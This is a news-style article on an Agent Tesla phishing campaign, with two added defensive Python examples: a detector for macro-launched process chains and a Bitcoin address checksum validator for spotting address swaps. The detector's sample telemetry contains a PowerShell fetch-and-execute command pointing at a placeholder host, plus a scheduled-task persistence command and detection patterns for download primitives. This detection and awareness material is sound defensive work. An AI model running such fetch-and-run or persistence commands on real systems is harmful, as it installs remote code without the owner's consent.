A phishing campaign is delivering a new variant of one of the oldest forms of remote access trojan (RAT) malware still in circulation, in an effort to steal usernames, passwords and other sensitive information. It also aims to steal cryptocurrency from the victim.

Agent Tesla first emerged in 2014 and it remains a common form of malware in 2021. The malware is focused on stealing sensitive information from compromised Windows machines with the aid of a keylogger, which sends what the victim is typing to the attacker, allowing them to see usernames, passwords and more.

Now researchers at Fortinet have detailed a new Agent Tesla campaign which distributes an updated version of the malware via phishing emails.

The malicious messages are designed to look like ordinary business email. One example asks the user to open a Microsoft Excel attachment titled “Order Requirements and Specs”. The document contains a macro which, if the user allows it to run, starts a multi-stage process that downloads and executes Agent Tesla on the machine.


This is done across a number of different stages, including downloading PowerShell files, running VBScript and creating a scheduled task, all of which help mask the installation of the malware and allow the attacker to secretly monitor activity on the machine. This version of Agent Tesla checks in with its operator every 20 minutes, sending any newly captured input.
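For security-operations readers, the chain described above (Excel macro, then PowerShell, then VBScript, then a scheduled task) is also a detection opportunity: none of those programs should normally be launched beneath an Office process. The Python below is an added example, not code from the original article or from Fortinet's analysis. It walks constructed, Sysmon-style process-creation events (the paths, PIDs, command lines and the example.invalid URL are all invented for illustration), rebuilds each process's ancestry, and flags script hosts, download primitives, encoded commands and scheduled-task creation that descend from an Office application.

```python
import re

# Process images that indicate the lure document was opened in Office.
OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}
# Script and command hosts an Office document has no legitimate reason to launch.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "cmd.exe", "mshta.exe"}

# Command-line patterns for the individual stages of the chain (assumed, illustrative patterns).
DOWNLOAD_RE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|net\.webclient|start-bitstransfer", re.I)
ENCODED_RE = re.compile(r"\s-(?:e|ec|enc|encodedcommand)\s", re.I)
SCHTASK_RE = re.compile(r"schtasks(?:\.exe)?\s.*/create", re.I)


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def ancestors(event, by_pid):
    """Image names of the parent, grandparent, ... of an event (stops at the root or on a PID loop)."""
    chain, seen, pid = [], set(), event["ppid"]
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain


def analyze(events):
    """Return (pid, image, reasons) for each process under an Office app that looks like a stage of the chain."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        if not any(a in OFFICE_APPS for a in ancestors(e, by_pid)):
            continue  # only processes descending from Office are of interest here
        img, cmd, reasons = basename(e["image"]), e.get("command_line", ""), []
        if img in SCRIPT_HOSTS:
            reasons.append(f"{img} launched beneath an Office process")
        if DOWNLOAD_RE.search(cmd):
            reasons.append("download primitive in command line")
        if ENCODED_RE.search(cmd):
            reasons.append("encoded PowerShell command")
        if SCHTASK_RE.search(cmd):
            reasons.append("scheduled task creation (persistence)")
        if reasons:
            findings.append((e["pid"], img, reasons))
    return findings


# Constructed sample telemetry (Sysmon event 1 style, fields trimmed); paths, PIDs and the URL are invented.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "command_line": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "command_line": r'"EXCEL.EXE" "C:\Users\jdoe\Downloads\Order Requirements and Specs.xls"'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -NoP -W Hidden -c \"IEX (New-Object Net.WebClient)"
                     ".DownloadString('http://example.invalid/stage1.ps1')\""},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\System32\wscript.exe",
     "command_line": r"wscript.exe //B C:\Users\Public\Libraries\update.vbs"},
    {"pid": 500, "ppid": 400, "image": r"C:\Windows\System32\schtasks.exe",
     "command_line": r'schtasks.exe /Create /SC ONLOGON /TN "OneDriveUpdater" /TR "wscript.exe C:\Users\Public\Libraries\update.vbs"'},
    {"pid": 600, "ppid": 200, "image": r"C:\Windows\splwow64.exe", "command_line": "splwow64.exe"},  # benign Excel child
    {"pid": 700, "ppid": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe Get-ChildItem"},  # admin use, not under Office: not flagged
]

if __name__ == "__main__":
    for pid, img, reasons in analyze(SAMPLE_EVENTS):
        print(pid, img, "; ".join(reasons))
```

On the sample data the PowerShell, VBScript and schtasks stages (PIDs 300, 400 and 500) are flagged, while Excel's printing helper and an administrator's unrelated PowerShell session are not. The ancestry walk is what makes the rule robust: the scheduled task is created four processes below Excel, so a simple parent/child pairing would miss it.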

In addition to this, the attack hijacks Bitcoin transfers made from the victim’s device. By monitoring activity on the machine, with the help of PowerShell code, the malware watches for a valid Bitcoin address. If one is spotted, the code replaces it with an address owned by the attacker, so that the victim unknowingly sends cryptocurrency to the criminals.
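The article does not say how the malware decides that a string is “a valid Bitcoin address”, but the standard address formats carry a checksum (Base58Check for addresses beginning with 1 or 3, Bech32 or Bech32m for bc1 addresses), so validity can be checked offline, and a defender can apply the same test to the address a user copied and the one that reached the paste site. The Python below is an added example, not code from the original article or from Fortinet's analysis; the two addresses it uses are well-known public test values (the Bitcoin genesis-block address and the BIP173 example address), and paste_mismatch() is an assumed helper name.

```python
import hashlib

B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
BECH32_CHARSET = "qpzry9x8gf2tvdw0s3jn54khce6mua7l"
BECH32M_CONST = 0x2BC830A3  # BIP350 checksum constant for witness versions 1 and above


def _b58decode(s):
    """Base58 decode; each leading '1' stands for a leading zero byte. None on a bad character."""
    n = 0
    for ch in s:
        idx = B58_ALPHABET.find(ch)
        if idx < 0:
            return None
        n = n * 58 + idx
    raw = n.to_bytes((n.bit_length() + 7) // 8, "big")
    pad = len(s) - len(s.lstrip("1"))
    return b"\x00" * pad + raw


def is_base58check_address(s):
    """Legacy (1...) and P2SH (3...) mainnet addresses: version byte + 20-byte hash + 4-byte double-SHA256 checksum."""
    raw = _b58decode(s)
    if raw is None or len(raw) != 25 or raw[0] not in (0x00, 0x05):
        return False
    checksum = hashlib.sha256(hashlib.sha256(raw[:-4]).digest()).digest()[:4]
    return checksum == raw[-4:]


def _bech32_polymod(values):
    """BCH checksum polynomial from BIP173."""
    generator = (0x3B6A57B2, 0x26508E6D, 0x1EA119FA, 0x3D4233DD, 0x2A1462B3)
    chk = 1
    for v in values:
        top = chk >> 25
        chk = ((chk & 0x1FFFFFF) << 5) ^ v
        for i in range(5):
            if (top >> i) & 1:
                chk ^= generator[i]
    return chk


def is_bech32_address(s):
    """Native segwit mainnet addresses (bc1...): Bech32 for witness v0, Bech32m for v1+."""
    if s != s.lower() and s != s.upper():
        return False  # mixed case is forbidden by the spec
    s = s.lower()
    pos = s.rfind("1")  # separator between human-readable part and data
    if pos < 1 or pos + 7 > len(s) or len(s) > 90:
        return False
    hrp, data = s[:pos], s[pos + 1:]
    if hrp != "bc":
        return False
    values = [BECH32_CHARSET.find(c) for c in data]
    if min(values) < 0:
        return False
    expanded_hrp = [ord(c) >> 5 for c in hrp] + [0] + [ord(c) & 31 for c in hrp]
    polymod = _bech32_polymod(expanded_hrp + values)
    return polymod == 1 if values[0] == 0 else polymod == BECH32M_CONST


def is_bitcoin_address(s):
    return is_base58check_address(s) or is_bech32_address(s)


def paste_mismatch(copied, pasted):
    """True when the user copied a valid address but a *different* valid address arrived at the paste site:
    the signature of the address-swapping behaviour described in the article."""
    return is_bitcoin_address(copied) and is_bitcoin_address(pasted) and copied != pasted


# Public test values: the genesis-block address and the BIP173 P2WPKH example. Not attacker-controlled.
GENESIS_ADDRESS = "1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa"
BIP173_ADDRESS = "bc1qw508d6qejxtdg4y5r3zarvary0c5xw7kv8f3t4"

if __name__ == "__main__":
    print(is_bitcoin_address(GENESIS_ADDRESS), is_bitcoin_address(BIP173_ADDRESS))
    print(paste_mismatch(GENESIS_ADDRESS, BIP173_ADDRESS))
```

The checksum is the practical point: a single corrupted character fails both checks, so a mismatch between a valid copied address and a valid but different pasted address is not a typo, it is substitution. Users should compare the first and last few characters of a pasted address against the source before sending, and the functions above can back an endpoint script that does the same comparison automatically.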

Despite being around since 2014, Agent Tesla remains popular with cyber criminals because it stays effective and is relatively cheap: a licence can cost as little as $15 on underground forums.

In addition to low cost, the authors of Agent Tesla offer 24/7 technical support, allowing it to serve as an entry point for less sophisticated cyber criminals – while still being potentially damaging to any person or organisation which falls victim to the malware.

Many of the attacks continue to be distributed by phishing emails, which means that with the right precautions, falling victim can be avoided. Cybersecurity researchers recommend using anti-virus software to detect suspicious activity, while users should be careful when it comes to opening attachments from unknown or unexpected emails. Because this infection only proceeds if the macro is allowed to run, blocking macros in Office files that arrive from the internet, which Office can enforce by policy, removes this particular entry point regardless of whether the user is fooled by the lure.